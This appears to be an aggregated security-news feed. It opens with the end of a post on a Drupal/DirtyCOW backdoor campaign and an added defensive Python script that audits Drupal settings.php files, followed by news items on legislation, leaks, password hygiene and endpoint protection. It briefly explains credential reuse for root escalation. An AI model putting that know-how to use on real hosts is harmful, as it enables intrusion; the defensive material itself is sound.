Administrators should make sure that their web application is fully patched, as well as the operating system of the host. Alternatively, it is possible to use an external security solution, such as a WAF, to block the attack before it reaches the server. Imperva customers are protected out of the box.
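As an added defender-side check (example code, not Imperva’s tooling or part of the original post), the script below audits a Drupal settings.php for the two conditions the campaign relied on: a database connection that authenticates as ‘root’ (so a password harvested from the settings file may also be the OS root password) and a settings file left writable by the web-server user. The two settings.php samples are constructed for the example.

```python
"""Audit a Drupal settings.php for the weaknesses abused in the Drupal/DirtyCOW
campaign: DB credentials that double as the OS root account, and a writable
settings file. Added example; the sample settings.php content is constructed."""
import os
import re
import stat
from dataclasses import dataclass
from typing import Dict, List, Optional

# One $databases[...] = array( ... ); or [ ... ]; block (Drupal 7 and 8 syntax).
_DB_BLOCK_RE = re.compile(
    r"\$databases.*?=\s*(?:array\s*\(|\[)(.*?)(?:\)|\]);", re.S)
# A quoted 'key' => 'value' pair inside such a block.
_KV_RE = re.compile(r"['\"](\w+)['\"]\s*=>\s*['\"]([^'\"]*)['\"]")


@dataclass
class Finding:
    severity: str
    message: str


def parse_database_settings(text: str) -> Dict[str, str]:
    """Return the merged key/value pairs of all $databases blocks in the file.

    Later blocks override earlier ones, so the empty `$databases = array();`
    that Drupal 7's default.settings.php ships with does not hide the real block.
    """
    settings: Dict[str, str] = {}
    for block in _DB_BLOCK_RE.finditer(text):
        settings.update(_KV_RE.findall(block.group(1)))
    return settings


def audit_settings(text: str, mode: Optional[int] = None) -> List[Finding]:
    """Audit settings.php content (and optionally its permission bits)."""
    findings: List[Finding] = []
    db = parse_database_settings(text)
    if not db:
        return [Finding("info", "no $databases block found; nothing to audit")]
    if db.get("username", "").lower() == "root":
        findings.append(Finding(
            "high", "database connection authenticates as 'root'; a harvested "
                    "DB password may also unlock the OS root account via 'su'"))
    if db.get("password", "") == "":
        findings.append(Finding("high", "database password is empty"))
    if mode is not None and mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(Finding(
            "medium", "settings.php is writable by group or others; code running "
                      "as the web-server user could alter or re-plant it"))
    return findings


def audit_file(path: str) -> List[Finding]:
    """Convenience wrapper: read the file and take its mode bits from disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return audit_settings(text, os.stat(path).st_mode & 0o777)


# Constructed sample: root DB user, as in the campaign described above.
SAMPLE_WEAK = """<?php
$databases['default']['default'] = array (
  'database' => 'drupal',
  'username' => 'root',
  'password' => 'Sup3rS3cret!',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
  'prefix' => '',
);
"""

# Constructed sample: dedicated DB user, Drupal 8 array syntax.
SAMPLE_HARDENED = """<?php
$databases = array();
$databases['default']['default'] = [
  'database' => 'drupal',
  'username' => 'drupal_app',
  'password' => 'constructed-placeholder-password',
  'host' => '127.0.0.1',
  'driver' => 'mysql',
];
"""

if __name__ == "__main__":
    for label, sample, mode in (("weak", SAMPLE_WEAK, 0o666),
                                ("hardened", SAMPLE_HARDENED, 0o440)):
        print(f"[{label}] mode={oct(mode)}")
        for f in audit_settings(sample, mode) or [Finding("ok", "no findings")]:
            print(f"  {f.severity}: {f.message}")
```

Run `audit_file("sites/default/settings.php")` from a shell on the host to audit a real deployment; a clean result only covers the two conditions above, not the Drupalgeddon2 or DirtyCOW patch state.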

The post DirtyCOW Bug Drives Attackers to A Backdoor in Vulnerable Drupal Web Servers appeared first on Blog.

Cybersecurity Is Getting Its Own Agency

Without any notable opposition to the Senate’s version of the bill, the House agreed to a reorganization of the Cybersecurity and Infrastructure Security Agency (CISA) Act earlier this week, according

The post Cybersecurity Is Getting Its Own Agency appeared first on The Cyber Security Place.

Major SMS Leak Exposed Millions Of Messages

Two-factor authentication codes were also exposed in Voxox leak. A huge database with user names, smartphone numbers, SMS messages and even two-factor authentication codes has been exposed, putting personal details at

The post Major SMS Leak Exposed Millions Of Messages appeared first on The Cyber Security Place.

BYOD Posing Major Mobile Security Risks

More and more organisations are allowing employees to bring their own devices for work. More than four in five organisations allow their employees to bring their own devices (BYOD) to

The post BYOD Posing Major Mobile Security Risks appeared first on The Cyber Security Place.

Review: Specops Password Policy

All who work in the information security industry agree that passwords are one of the worst security nightmares of the modern information security age. Having weak passwords – even as part of a multi-factor authentication scheme – degrades the security posture of an organization. Unfortunately, as passwords scale well, they are still present in practically every organization and even central authentication places like Active Directory. There are multiple security controls, even in core operating systems, … More

The post Review: Specops Password Policy appeared first on Help Net Security.

Remote working may boost productivity, but also leave you vulnerable to attack

New flexible working practices could pose a security risk to small businesses, with one in five employees (21%) stating they are most productive when working in public spaces like a cafe or library, but only 18% concerned about the security implications this could have. SMBs therefore face the challenge of keeping their business secure while adhering to the needs and expectations of the modern workforce, according to Avast. Concerns small business staff … More

The post Remote working may boost productivity, but also leave you vulnerable to attack appeared first on Help Net Security.

In a post-EMV world, fraud is shifting from in-person to ecommerce channels

Three years after the switch to new chip-based credit and debit cards, a study by the National Retail Federation and Forrester says payment card fraud is still a top concern for large U.S. retailers as criminals move their activities online. “The implementation of EMV chip cards and chip card readers was supposed to dramatically reduce credit and debit card fraud,” the State of Retail Payments report said. “So why is fraud still the top concern … More

The post In a post-EMV world, fraud is shifting from in-person to ecommerce channels appeared first on Help Net Security.

Cybersecurity Is (Still) Everyone’s Job

As noted previously—and as we all know—an organization cannot be secure until the entire workforce is engaged in reducing cyber risks. Each member of the group has the power to harm or to help, since each one has access to information systems, handles sensitive data and makes decisions every day which maintain, erode or strengthen […]… Read More

The post Cybersecurity Is (Still) Everyone’s Job appeared first on The State of Security.

Japanese government’s cybersecurity strategy chief has never used a computer

The Japanese government’s cybersecurity strategy chief Yoshitaka Sakurada is in the middle of a heated debate following his admission about his computer skills.

Yoshitaka Sakurada admitted that he has never used a computer in his professional life, even though the Japanese government assigned him responsibility for the cybersecurity of the 2020 Tokyo Olympics.

Sakurada was only appointed as cyber minister in October after Japanese Prime Minister Shinzo Abe was re-elected as head of the Liberal Democratic Party.

When the independent lawmaker Masato Imai questioned Sakurada about his computer skills in a lower house session, the Japanese politician confirmed that he has never used a computer since he was 25 years old.

“Since I was 25 years old and independent I have instructed my staff and secretaries. I have never used a computer,” said Yoshitaka Sakurada.

Of course, the response shocked the audience, including Imai.

“I find it unbelievable that someone who is responsible for cybersecurity measures has never used a computer,” said Imai.

“It’s a matter that should be dealt with by the government as a whole. I am confident that I am not at fault,” replied Sakurada.

This isn’t the first time Sakurada has been at the center of a controversy: in 2016 he was admonished for saying that women forced into wartime Japanese military brothels were “prostitutes by occupation.”

At the time, the South Korean government rebuked the Japanese government, and Sakurada was obliged to retract the remarks. During the war, many Korean women were forced into sexual slavery by Japan’s Imperial Army.

Pierluigi Paganini

(Security Affairs – Japanese cybersecurity strategy chief, politics)

The post Japanese government’s cybersecurity strategy chief has never used a computer appeared first on Security Affairs.

What Your Password Says About You

At the end of last year, a survey revealed that the most popular password was still “123456,” followed by “password.” These highly hackable choices are despite years of education around the importance of password security. So, what does this say about people who pick simple passwords? Most likely, they are shooting for a password that is easy to remember rather than super secure.

The urge to pick simple passwords is understandable given the large number of passwords required in our modern lives—from banking, social media, and online services to simply unlocking our phones. But choosing weak passwords can be a major mistake, opening you up to theft and identity fraud.

Even if you choose complicated passwords, the recent rash of corporate data breaches means you could be at even greater risk by repeating passwords across accounts. When you repeat passwords, all a hacker needs to do is breach one service provider to obtain a password that can unlock a string of accounts, including your online banking services. These accounts often include identity information, leaving you open to impersonation. The bad guys could open fraudulent accounts in your name, for example, or even collect your health benefits.

So, now that you know the risks of weak password security, let’s see what your password says about you. Take this quiz to find out, and don’t forget to review our password safety tips below!

Password Quiz – Answer “Yes” or “No”

  1. Your passwords don’t include your address, birthdate, anniversary, or pet’s name.
  2. You don’t repeat passwords.
  3. Your passwords are at least 8 characters long and include numbers, upper and lower case letters, and special characters.
  4. You change default passwords on devices to something hard to guess.
  5. You routinely lock your phone and devices with a passcode or fingerprint.
  6. You don’t share your passwords with people you’re dating or friends.
  7. You use a password manager.
  8. If you write your passwords down, you keep them hidden in a safe place, where no one else can find them.
  9. You get creative with answers to security questions to make them harder to guess. For example, instead of naming the city where you grew up, you name your favorite city, so someone who simply reads your social media profile cannot guess the answer.
  10. You make sure no one is watching when you type in your passwords.
  11. You try to make your passwords memorable by including phrases that have meaning to you.
  12. You use multi-factor authentication.

Now, give yourself 1 point for each question you answered “yes” to, and 0 points for each question you answered “no” to. Add them up to see what your password says about you.

9-12 points:

You’re a Password Pro!

You take password security seriously and know the importance of using unique, complicated passwords for each account. Want to up your password game? Use multi-factor authentication, if you don’t already. This is when you use more than one method to authenticate your identity before logging in to an account, such as typing in a password, as well as a code that is sent to your phone via text message.

4-8 points

You’re a Passable Passworder

You go through the basics, but when it comes to making your accounts as secure as they can be you sometimes skip important steps. Instead of creating complicated passwords yourself—and struggling to remember them—you may want to use a password manager, and let it do the work for you. Soon, you’ll be a pro!

1-3 points

You’re a Hacker’s Helper

Uh oh! It looks like you’re not taking password security seriously enough to ensure that your accounts and data stay safe. Start by reading through the tips below. It’s never too late to upgrade your passwords, so set aside a little time to boost your security.

Key Tips to Become a Password Pro:

  • Always choose unique, complicated passwords—Try to make sure they are at least 8 characters long and include a combination of numbers, letters, and special characters. Don’t repeat passwords for critical accounts, like financial and health services, and keep them to yourself. Also, consider using a password manager to help create and store unique passwords for you. This way you don’t have to write passwords down or memorize them. Password managers are sometimes offered as part of security software.
  • Make your password memorable—We know that people continue to choose simple passwords because they are easier to remember, but there are tricks to creating complicated and memorable passwords. For instance, you can string random words together that mean something to you, and intersperse them with numbers and characters. Or, you can choose random letters that form a pattern known only to you, such as the first letter of each word in a sentence from your favorite book.
  • Use comprehensive security software—Remember, a strong password is just the first line of defense. Back it up with robust security software that can detect and stop known threats, help you browse safely, and protect you from identity theft.

For more great password tips, go here.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What Your Password Says About You appeared first on McAfee Blogs.

With The NASDAQ Bell Ceremony, We Kick Off The Next Leg of Imperva’s Incredible Journey

On Friday morning our CEO Chris Hylen and company execs rang the NASDAQ opening bell in New York, welcoming another day of trading for the world’s second-largest stock exchange, and took full advantage of the opportunity to celebrate recent corporate milestones for Imperva.

 

“I’m honored to be standing here today, alongside our management team, representing our amazing employees around the globe.  I’d like to thank each of my Imperva colleagues for their dedication to our customers, passion for innovation, and commitment to protecting data and applications,” said Hylen.

Market Bell Ceremonies at the Nasdaq Market Site in New York’s Times Square don’t come along every day, and for us, the event hits even closer to home. As a member of NASDAQ for the last five years, Imperva also happens to protect the stock exchange’s websites, applications, APIs and databases from cyber attacks.

“For enterprises, data is vital and applications are how they run the business – it’s essential that businesses protect both of these critical assets from cybercriminals.”

What better place, then, than our home since 2016 to usher in the new Imperva with a sneak peek at our new logo, which represents what we’ll look and feel like to our fellow employees, customers, partners, and prospects. We’re putting the world on notice that the new Imperva is coming – aligned with our strategy, our credo, and our mission.

“We pride ourselves in the role we play in delivering simple, effective, and enduring protection for our customers.  We innovate using data, analytics, best of breed software and our community’s expertise.”

The post With The NASDAQ Bell Ceremony, We Kick Off The Next Leg of Imperva’s Incredible Journey appeared first on Blog.

6 security concerns to consider when automating your business

Automation is an increasingly enticing option for businesses, especially when those in operations are in a perpetual cycle of “too much to do and not enough time to do it.”

When considering an automation strategy, business representatives must be aware of any security risks involved. Here are six concerns network admins and other IT staff should keep in mind.

1. Using automation for cybersecurity in counterproductive ways

The cybersecurity teams at many organizations are overextended, accustomed to taking on so many responsibilities that their overall productivity goes down. Automating some cybersecurity tasks could provide much-needed relief for those team members, as long as those employees use automation strategically.

For example, if cybersecurity team members automate standard operating procedures, they’ll have more time to triage issues and investigate potential vulnerabilities. But, the focus must be on using automation in a way that makes sense for cybersecurity—as well as the other parts of the business. Human intelligence is still needed alongside automation in order to better identify threats, analyze patterns, and quickly make use of available resources. If you build up defenses but leave them unattended, eventually the enemies are going to break through.

2. Giving too many people access to automatic payment services

Forgetting to pay a bill on time is embarrassing and can negatively affect a company’s access to lines of credit. Fortunately, companies can use numerous automatic bill-paying services to deduct the necessary amounts each month, often on a specified day.

Taking that approach prevents business representatives from regularly having to pull credit cards out of their wallets and manually type the numbers into forms. However, it’s a best practice to restrict the number of people who can set up those payments and verify that they happen.

Otherwise, if there are problems with a payment, it’ll become too difficult to investigate what went wrong. In addition, there’s a possibility of insider threats, such as a disgruntled employee or someone looking to get revenge after termination. Malicious insiders could access a payment service and change payment schedules, delete payment methods, withdraw large amounts, or otherwise wreak havoc.

3. Thinking that automation is infallible

One of the especially handy things about automation is that it can reduce the number of errors people make. Statistics indicate that almost 71 percent of workers report being disengaged at the office. Repetitive tasks are often to blame, and automation could reduce the boredom people feel (and the mistakes they make) by freeing them for more challenging projects.

Regardless of the ways they use automation, IT admins mustn’t fall into the habit of believing that automated tools are foolproof and that it isn’t necessary to check for mistakes. For example, if a company uses automation to deal with financial content, such as invoices, it should not adopt a relaxed approach to keeping that information secure just because a tool is now handling the task.

In all responsibilities that involve keeping data secure, humans still play a vital role in ensuring things are working as they should. After all, people are the ones who set up the processes that automation carries out, and those people could have made mistakes, too.

4. Failing to account for GDPR

The General Data Protection Regulation (GDPR) went into effect in May 2018, and it determines how businesses must treat the data of customers in the European Union. Being in violation could result in substantial fines for businesses, yet some companies aren’t even aware they’re doing something wrong.

Keeping information in a customer relationship management (CRM) database could maintain GDPR compliance by helping businesses have accurate and up-to-date records of their customers, making it easier to ensure they treat that information appropriately. As the GDPR gives customers numerous rights, including the right to have data erased or the right to have the data stored but not processed, any automation tools selected by an organization need to be agile enough to accommodate those requests.

Automation—whether achieved through a CRM tool or otherwise—can actually help companies better align with GDPR regulations. In fact, it’s essential that companies not overlook GDPR when they choose ways to automate processes.

5. Not using best practices with password managers

Password managers are incredibly convenient and secure because they store, encrypt, and automatically fill in the proper passwords for any number of respective accounts—as long as users know the correct master password. Some of them even automate filling in billing details by storing payment information in secure online wallets.

However, there are wrong ways to use password managers for business or personal purposes. For example, if a person chooses a master password that she’s already used on multiple other sites or shares that password with others, she’s defeated the purpose of the password manager. Choosing a password manager with multi-factor authentication is our recommendation for the most secure way to log into your accounts.

It’s undoubtedly convenient to visit a site and have it automatically fill in your password for you with one click. But, password managers only work as intended when employees use them correctly.

6. Ignoring notifications to update automation software

Many automation tools display pop-up messages when new software updates are available. Sometimes the updates only encompass new features, but it’s common for them to address bugs that could compromise security. When the goal is to dive into work and get as much done as possible, taking a few minutes to update automation software isn’t always an appealing option.

But, if outdated software ends up leading to an attack and compromising customer records, people will wish they didn’t procrastinate. It’s best for businesses to get on a schedule, such as checking automation software for updates on a particular day each month (Patch Tuesday, for example).

Fortunately, many software titles allow people to choose the desired time for the update to happen, or in essence, automate the maintenance of automation software. Then, users can set the software to update outside of business hours or during other likely periods of downtime.

Automation is advantageous—if security remains a priority

Although automation can be a tremendous help to businesses, it can also pose risks if misused, neglected, or too heavily relied upon. Staying aware of the security-related issues raised in this article helps organizations of all sizes and in all industries use automated tools safely and effectively.

The post 6 security concerns to consider when automating your business appeared first on Malwarebytes Labs.

This Week in Security News: Holiday Cybercriminals & Cryptomining Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn the common threats and the best practices for defending against cybercriminals during November’s online shopping season. Also, see the different cryptomining malware affecting Linux systems and learn what security tools are needed to defend against these threats.

Read on:

Cryptocurrency Mining Malware uses Various Evasion Techniques, Including Windows Installer, as Part of its Routine

The evolving aspect of cryptocurrency mining malware — constantly adding evasion techniques — means that powerful security tools are often needed to defend users from these kinds of threats. 

Researchers Earn Thousands for Exposing Mobile Device Exploits at Pwn2Own

Security researchers competing in the Pwn2Own Tokyo competition earned a collective $325,000 for demonstrating new exploits on devices made by Samsung, Xiaomi and Apple.

Cryptocurrency-mining Malware Targets Linux Systems, Uses Rootkit for Stealth

Trend Micro recently encountered a cryptocurrency-mining malware affecting Linux systems. It is notable for hiding the malicious process’ presence from monitoring tools.  

House Passes Final Version of Bill Creating Cyber Agency at DHS, Sends Measure to President

The U.S. House of Representatives gave unanimous approval to create a stand-alone cybersecurity agency at the Department of Homeland Security, and sent the bill to President Trump for his signature.

When Cybercriminals Hitch On Your Holiday Spending: Online Shopping Trends and Threats

November is expected to see the bulk of 2018 online traffic and spending. Learn the common threats and the best practices for defending against cybercriminals during this online shopping season. 

Russian Hackers Largely Skipped the Midterms, and No One Really Knows Why

After unleashing cyberattacks on the U.S. during the 2016 presidential election, Russia’s hackers mostly appeared to have sat on the sidelines during the campaign ahead of last week’s midterm elections.

Using Machine Learning to Cluster Malicious Network Flows From Gh0st RAT Variants

To address the growing number of network threats and keep abreast with the changing sophistication of network intrusion methods, Trend Micro looks into network flow clustering. 

More than 50 Nations, but not U.S., Sign onto Cybersecurity Pact

At the Paris Peace Forum, an international agreement on cybersecurity principles earned signatures from over 50 nations, 130 private sector groups and 90 charitable groups, but not the U.S., Russia or China.

Hide and Script: Inserted Malicious URLs within Office Documents’ Embedded Videos

In late October, security researchers from Cymulate showed a PoC exploiting a logic bug that could allow hackers to abuse the online video feature in Microsoft Office to deliver malware.

Firefox Warns if the Website You’re Visiting Suffered a Data Breach

The Firefox Monitor service warns you if your account was among the hundreds of millions affected by data breaches at sites like Yahoo, LinkedIn and Equifax.

The Importance of Employee Cybersecurity Training: Top Strategies and Best Practices

With robust employee user training that helps drive home the importance of a staffer’s role in the overall data protection and cybersecurity landscape, businesses can reduce the risk of a digital attacker.

As cryptomining malware evolves, do you think more users will be prepared to defend against these threats in 2019? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Holiday Cybercriminals & Cryptomining Malware appeared first on .

Why the EU Is More Likely to Drive IT and Security Trends Than the US

The General Data Protection Regulation (GDPR) has been a game changer for data privacy, and U.S. companies are beginning to catch up to the EU in data management practices. However, privacy is only one area in which U.S. organizations are falling behind their European counterparts. To promote compliance with data privacy regulations, both current and forthcoming, U.S. companies will have to invest a lot more in advancing security programs.

What Drives Security Trends?

The largest companies tend to drive technology and security trends. However, European companies are pushing the envelope at a greater rate than American ones.

It likely comes down to GDPR. According to Spiceworks, regulatory changes surrounding data privacy — including huge fines surrounding a data breach — have led to a greater emphasis on security enhancements like encryption. This has also likely been the catalyst for the EU to adopt security technologies such as artificial intelligence (AI) and machine learning (ML).

Still, Spiceworks found that most companies on either continent turn to relatively inexpensive solutions to implement security — antivirus and security awareness training are the two most popular — as opposed to more aggressive defense strategies such as honeypots. More regulated industries are also more likely to adopt emerging security tools, which could explain why a region under the broadest data protection mandate is so far ahead.

Identify Your Program’s Weak Links

Spiceworks found that American companies tend to prefer security awareness as their primary solution for cybersecurity, as opposed to the EU, which favors technology-based tools. However, according to a study by MediaPro, 85 percent of employees who work in the financial industry, where a data breach can be particularly damaging, fail at basic security tasks such as recognizing personal data. Financial employees were also unable to tell the difference between a phishing scam and legitimate email, and the majority of employees do not alert IT or security staff when they do see a problem.

Relying on security awareness training as the primary security tool is risky. At the same time, even technological tools that improve workplace efficiency expand the organization’s digital attack surface.

Improving IT Starts With Budgeting

Spiceworks looked at the state of IT budgets, which are either staying the same or increasing across both American and European businesses. Primary spending drivers include replacing old tech and preparing for the end of Windows 7 support, which will happen in 2020, according to the survey.

Although security-specific spending is projected to increase in the coming year, according to the report, updating aging infrastructure is also a direct response to ransomware campaigns such as last year’s WannaCry attack and a way to promote compliance with data privacy regulations such as GDPR.

How Can Companies Budget Differently?

The size of the organization also plays a role in how it budgets. For example, while smaller companies are spending money to replace tech due to the end of its life cycle or for business growth, large enterprises are focused on improving their digital transformation with the latest technologies.

Across organizations, security software makes up about 10 percent of the IT budget. But, as the study noted, large enterprises of 5,000 employees or more are more likely to increase IT budgets due to heightened security concerns, whereas budgets at midsize organizations of 500 to 999 employees are more likely to grow due to corporate tax cuts.

American companies tend to be more averse to digital transformation than European ones. According to Spiceworks, one reason goes back to budgeting. To save money, organizations will wait out the life cycle of security technologies, using them until they don’t work anymore. If security leaders can adjust their existing tools to meet new requirements, thereby reducing costs, they likely will.

The cybersecurity skills shortage also comes into play. There aren’t enough skilled IT workers who can implement an automated security system, so it’s easier and cheaper to try and change behaviors of current employees and maintain old networks. This is especially true in small and midsize businesses.

Balance Security Awareness and Tech

The most effective security practices will blend security awareness with emerging security technologies.

People are prone to make errors, but decision-makers too often assume that an hourlong online seminar explaining how to spot a phishing campaign is an effective security training program. Instead, security awareness has to be built into an overall security policy and, like audits and penetration tests, conducted regularly.

Before building awareness training, decision-makers should recognize what they are securing. Is it customer data? Intellectual property? Personal devices connected to the network? Knowing what you are securing will provide a baseline of the type of awareness necessary.

The training itself should be interactive and frequent. Some companies will send out fake phishing emails to random employees to see who takes the bait. Employees who fail are required to do another round of training. Awareness training should explain why this particular information is being secured and, of course, grow with company needs.

Adding emerging security technologies is a bit trickier, because this will depend on budgets and staffing. Engaging a managed security service provider will add continuous monitoring to your network. Tools such as hardware authentication, privileged access and identity management systems, and user behavior analytics can trigger alerts of unauthorized use that even an effectively trained employee may not detect.

Companies Can’t Afford to Be Reactive

Cybersecurity has historically tended to be reactive — responding to an attack that’s already happened and working to prevent it from happening again. In a post-GDPR world, companies can’t afford to remain passive until after an incident.

As North American governments begin to address data privacy issues with their own legislation, companies will need to adapt similarly to their European counterparts. Expect to see more American organizations follow the EU’s example and adopt security technologies to better mitigate potential threats.

The post Why the EU Is More Likely to Drive IT and Security Trends Than the US appeared first on Security Intelligence.

Vaporworms: New breed of self-propagating fileless malware to emerge in 2019

WatchGuard Technologies’ information security predictions for 2019 include the emergence of vaporworms, a new breed of fileless malware with wormlike properties to self-propagate through vulnerable systems, along with a takedown of the internet itself and ransomware targeting utilities and industrial control systems. “Cyber criminals are continuing to reshape the threat landscape as they update their tactics and escalate their attacks against businesses, governments and even the infrastructure of the internet itself,” said Corey Nachreiner, CTO … More

The post Vaporworms: New breed of self-propagating fileless malware to emerge in 2019 appeared first on Help Net Security.

Online shoppers continue to engage in risky behavior

Findings from a new McAfee survey reveal the risky habits of online shoppers, including using unsecured Wi-Fi for online shopping and purchasing items from online retailers they are not fully confident are genuine (51 percent). This highlights the need for consumers to slow down and consider the risks of unsafe purchasing behavior that could lead to identity theft or financial loss. Last year consumers spent $453.46 billion on the web for retail purchases, which was … More

The post Online shoppers continue to engage in risky behavior appeared first on Help Net Security.

What senior finance executives think about payments security

A WEX survey of more than 1,000 CFOs and senior financial executives from the U.S., Europe and Asia/Oceania revealed that for this group, security is paramount in payments solutions or platforms. Security – both of information and settlements – is raised by executives as a concern in multiple aspects of payments processing. In fact, according to those surveyed, security of transactions is the single most important attribute of payments. More than half of American executives—53 … More

The post What senior finance executives think about payments security appeared first on Help Net Security.

Cloud interoperability and app mobility outrank cost and security for primary hybrid cloud benefits

Enterprises plan to increase hybrid cloud usage, with 91% stating hybrid cloud as the ideal IT model, but only 18% stating they have that model today, according to Nutanix. Application mobility across any cloud is a top priority for 97% of respondents – with 88% of respondents saying it would “solve a lot of my problems.” IT decision makers ranked matching applications to the right cloud environment as a critical capability, and 35% of organizations … More

The post Cloud interoperability and app mobility outrank cost and security for primary hybrid cloud benefits appeared first on Help Net Security.

Organizations unable to achieve business resilience against cyber threats

The Resilience Gap study, which surveyed over 4,000 business decision makers across the United States, United Kingdom, France, Germany and Japan found that while 96% of the global business decision makers believe that making technology resilient to business disruptions should be core to their firm’s wider business strategy, the reality is very different. In fact, only 54% of respondents claim that it definitely is.

Barriers to achieving business resilience

Despite 96% of respondents claiming that … More

The post Organizations unable to achieve business resilience against cyber threats appeared first on Help Net Security.

Law firms are increasingly investing in cybersecurity programs

Logicforce released the results of its most recent Law Firm Cybersecurity Scorecard, a periodic study designed to assess cybersecurity preparedness across the legal industry and educate law firms on data protection best practices. Results of the study indicate that law firms are increasingly investing in cybersecurity programs, but most law firms are not implementing many of the protocols that will comprehensively protect them and their clients over time. Many firms’ clients and potential clients are … More

The post Law firms are increasingly investing in cybersecurity programs appeared first on Help Net Security.

Don’t Get PWNed by Fake Gaming Currency Sites

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.

What’s new in Windows Defender ATP

Across Windows Defender Advanced Threat Protection (Windows Defender ATP) engineering and research teams, innovation drives our mission to protect devices in the modern workplace. Our goal is to equip security teams with the tools and insights to protect, detect, investigate, and automatically respond to attacks. We continue to be inspired by feedback from customers and partners, who share with us the day-to-day realities of security operations teams constantly keeping up with the onslaught of threats.

Today I’m excited to share with you some of the latest significant enhancements to Windows Defender ATP. We added new capabilities to each of the pillars of Windows Defender ATP’s unified endpoint protection platform: improved attack surface reduction, better-than-ever next-gen protection, more powerful post-breach detection and response, enhanced automation capabilities, more security insights, and expanded threat hunting. These enhancements boost Windows Defender ATP and accrue to the broader Microsoft Threat Protection, an integrated solution for securing identities, endpoints, cloud apps, and infrastructure.

Let’s look now at some of the new enhancements to Windows Defender ATP:

New attack surface reduction rules

Attack surface reduction forms the backbone of our answer to a host intrusion and prevention system (HIPS). Attack surface reduction protects devices directly, by controlling and limiting the ways in which threats can operate on a device. Today we are announcing two new rules:

  • Block Office communication applications from creating child processes
  • Block Adobe Reader from creating child processes

These new rules allow enterprises to prevent child processes from being created from Office communication apps (including Outlook) and from Adobe Reader, right at the workstation level. These help eliminate many types of attacks, especially those using macro and vulnerability exploits. We have also added improved customization for exclusions and allow lists, which can work for folders and even individual files.

Emergency security intelligence updates

Emergency security intelligence updates are a new, super-fast delivery method for protection knowledge. In the event of an outbreak, the Windows Defender ATP research team can now issue an emergency request to all cloud-connected enterprise devices to immediately pull dedicated intelligence updates directly from the Windows Defender ATP cloud. This reduces the need for security admins to take action or wait for internal client update infrastructure to catch up, which often takes hours or even longer, depending on configuration. There’s no special configuration for this other than ensuring cloud-delivered protection is enabled on devices.

Top scores in independent industry tests

Machine learning and artificial intelligence drive our Windows Defender ATP solution to block 5 billion threats every month and to consistently achieve top scores in independent industry tests: perfect scores in protection, usability, and performance test modules in the latest evaluation by AV-TEST; 99.8% protection rate in the latest real-world test by AV-Comparatives; and AAA accuracy rating in the latest SE Labs test.

We have added dedicated detections for cryptocurrency mining malware (coin miners) which have increasingly become a problem, even for enterprises. We have also increased our focus on detecting and disrupting tech support scams while they are happening.

Protecting our security subsystems using sandboxing

We’ve also continued to invest in hardening our platform to make it harder for malicious actors to exploit vulnerabilities and bypass the operating system’s built-in security features. We’ve done this by putting Windows Defender ATP’s antivirus in a dedicated sandbox. Sandboxing makes it significantly more difficult for an attacker to tamper with and exploit the antivirus solution as a means to compromise the device itself.

Evolving from individual alerts to Incidents

We are introducing Incidents, an aggregated view that helps security analysts to understand the bigger context of a complex security event. As attacks become more sophisticated, security analysts face the challenge of reconstructing the story of an attack. This includes identifying all related alerts and artifacts across all impacted machines and then correlating all of these across the entire timeline of an attack.

With Incidents, related alerts are grouped together, along with the machines involved and the corresponding automated investigations, presenting all collected evidence and showing the end-to-end breadth and scope of an attack. By transforming the queue from hundreds of individual alerts to a more manageable number of meaningful aggregations, Incidents eliminate the need to review alerts sequentially and to manually correlate malicious events across the organization, saving up to 80% of analyst time.

The Incident graph view shows you the relations between the entities, with additional details in the side pane when you click on an item.

Automating response for fileless attacks

We expanded automation in Windows Defender ATP to automatically investigate and remediate memory-based attacks, also known as fileless threats. We see more and more of these memory-based threats, and while weve had the optics to detect them, security analysts needed special investigation skills to solve them. Windows Defender ATP can now leverage automated memory forensics to incriminate memory regions and perform required in-memory remediation actions.

With this new unique capability, we are shifting from simply alerting to a fully automated investigation and resolution flow for memory-based attacks. This increases the range of threats addressable by automation and further reduces the load on security teams.

Process injection automatically investigated and remediated

Threat analytics

Threat analytics is a set of interactive threat intelligence reports published by our research team as soon as emerging threats and outbreaks are identified. The Threat analytics dashboard provides a technical description and data about a threat, and answers the key question: “Does WDATP detect this threat?” It also provides recommended actions to contain and prevent specific threats, as well as increase organizational resilience.

